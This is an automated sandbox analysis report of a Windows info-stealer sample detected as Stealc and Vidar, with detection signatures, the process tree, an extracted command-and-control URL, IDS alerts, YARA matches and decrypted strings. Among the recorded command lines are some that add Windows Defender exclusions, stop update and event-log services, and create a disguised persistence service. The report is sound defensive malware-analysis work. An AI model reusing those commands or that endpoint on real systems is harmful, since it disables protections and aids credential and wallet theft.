Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b4s45TboUL.exe

Overview

General Information

Sample name:b4s45TboUL.exe
renamed because original name is a hash value
Original sample name:b6f6e51f0efa952f3ffcaab9dd5895db.exe
Analysis ID:1545664
MD5:b6f6e51f0efa952f3ffcaab9dd5895db
SHA1:dadb11d90adb38dc798acae755004ed8e93b088f
SHA256:7bfc486e94aacc90fac1037845f79f92f04a0db6fbbab9eaa45c4afe7d0a21fe
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the hosts file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • b4s45TboUL.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\b4s45TboUL.exe" MD5: B6F6E51F0EFA952F3FFCAAB9DD5895DB)
    • cmd.exe (PID: 2816 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • HIIDGCGCBF.exe (PID: 2828 cmdline: "C:\ProgramData\HIIDGCGCBF.exe" MD5: 0F247FC98A73243773ED3614FFAD3118)
        • powershell.exe (PID: 7084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 3264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 3620 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6320 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 2208 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2648 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2000 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1696 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1860 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 5780 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 5924 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1136 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1732 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2872 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 792 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • updater.exe (PID: 1740 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 0F247FC98A73243773ED3614FFAD3118)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}
{"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 6 entries
          SourceRuleDescriptionAuthorStrings
          0.3.b4s45TboUL.exe.2570000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.b4s45TboUL.exe.2490e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.b4s45TboUL.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.b4s45TboUL.exe.2490e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.b4s45TboUL.exe.2570000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Change of critical system settings

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5780, ProcessName: powercfg.exe

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7084, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7084, ProcessName: powershell.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 1732, ProcessName: sc.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7084, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3052, ProcessName: svchost.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6536, ProcessName: sc.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:00.945251+010020442451Malware Command and Control Activity Detected45.91.200.3980192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:00.915029+010020442441Malware Command and Control Activity Detected192.168.2.44973045.91.200.3980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:01.177086+010020442461Malware Command and Control Activity Detected192.168.2.44973045.91.200.3980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:08.220875+010020442491Malware Command and Control Activity Detected192.168.2.44973045.91.200.3980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:02.064214+010020442481Malware Command and Control Activity Detected192.168.2.44973045.91.200.3980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:01.184458+010020442471Malware Command and Control Activity Detected45.91.200.3980192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:00.667787+010020442431Malware Command and Control Activity Detected192.168.2.44973045.91.200.3980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-30T19:47:02.569101+010028033043Unknown Traffic192.168.2.44973045.91.200.3980TCP
                    2024-10-30T19:47:10.996740+010028033043Unknown Traffic192.168.2.44973187.106.236.48443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: b4s45TboUL.exeAvira: detected
                    Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}
                    Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}
                    Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 47%
                    Source: C:\ProgramData\HIIDGCGCBF.exeReversingLabs: Detection: 47%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exeReversingLabs: Detection: 47%
                    Source: b4s45TboUL.exeReversingLabs: Detection: 39%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: b4s45TboUL.exeJoe Sandbox ML: detected
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: INSERT_KEY_HERE
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 22
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 11
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 20
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 24
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetProcAddress
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: LoadLibraryA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: lstrcatA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: OpenEventA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateEventA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CloseHandle
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Sleep
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetUserDefaultLangID
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: VirtualAllocExNuma
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: VirtualFree
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetSystemInfo
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: VirtualAlloc
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HeapAlloc
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetComputerNameA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: lstrcpyA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetProcessHeap
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetCurrentProcess
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: lstrlenA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ExitProcess
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GlobalMemoryStatusEx
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetSystemTime
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SystemTimeToFileTime
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: advapi32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: gdi32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: user32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: crypt32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ntdll.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetUserNameA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateDCA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetDeviceCaps
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ReleaseDC
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CryptStringToBinaryA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sscanf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: VMwareVMware
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HAL9TH
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: JohnDoe
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DISPLAY
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %hu/%hu/%hu
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: http://45.91.200.39
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: gjtwvm
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: /eaa194fa594ff9c2.php
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: /cb9cc10e175e1537/
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: LogsDiller
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetEnvironmentVariableA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetFileAttributesA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GlobalLock
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HeapFree
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetFileSize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GlobalSize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateToolhelp32Snapshot
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: IsWow64Process
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Process32Next
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetLocalTime
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: FreeLibrary
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetTimeZoneInformation
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetSystemPowerStatus
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetVolumeInformationA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetWindowsDirectoryA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Process32First
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetLocaleInfoA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetUserDefaultLocaleName
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetModuleFileNameA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DeleteFileA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: FindNextFileA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: LocalFree
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: FindClose
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SetEnvironmentVariableA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: LocalAlloc
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetFileSizeEx
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ReadFile
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SetFilePointer
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: WriteFile
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateFileA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: FindFirstFileA
